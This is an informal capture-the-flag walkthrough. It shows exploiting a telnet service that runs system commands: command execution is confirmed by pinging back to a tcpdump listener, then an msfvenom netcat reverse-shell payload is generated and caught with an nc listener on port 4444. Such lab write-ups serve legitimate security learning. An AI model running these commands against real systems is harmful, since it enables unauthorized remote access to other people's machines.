Let exploit some common vulnerablity in the telnet client and system server let hit it since we have the IP and port let connect to it with
telnet IP PORT .
Now let try to execute some commands.
Hmmm we got nothing now let’s check to see if what we’re typing is being executed as a system command.
Let start up a tcpdump listener on our machine.
sudo tcpdump ip proto \\icmp -i tun0
This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.
Now let try to ping our IP on the telnet server and check our tcpdump listener.
.RUN ping Local-IP -c 1
Cool we are able to execute system commands since we are able to ping our local IP now let get reverse shell let generate a reverse shell code with msfvenom.
msfvenom -p cmd/unix/reverse_netcat lhost=Local-IP lport=4444 R
now let start our ncat listener
nc -nvlp 4444 and run the reverse shell code on the telnet client.
And we have shell back to our terminal.
Greeting From Muzec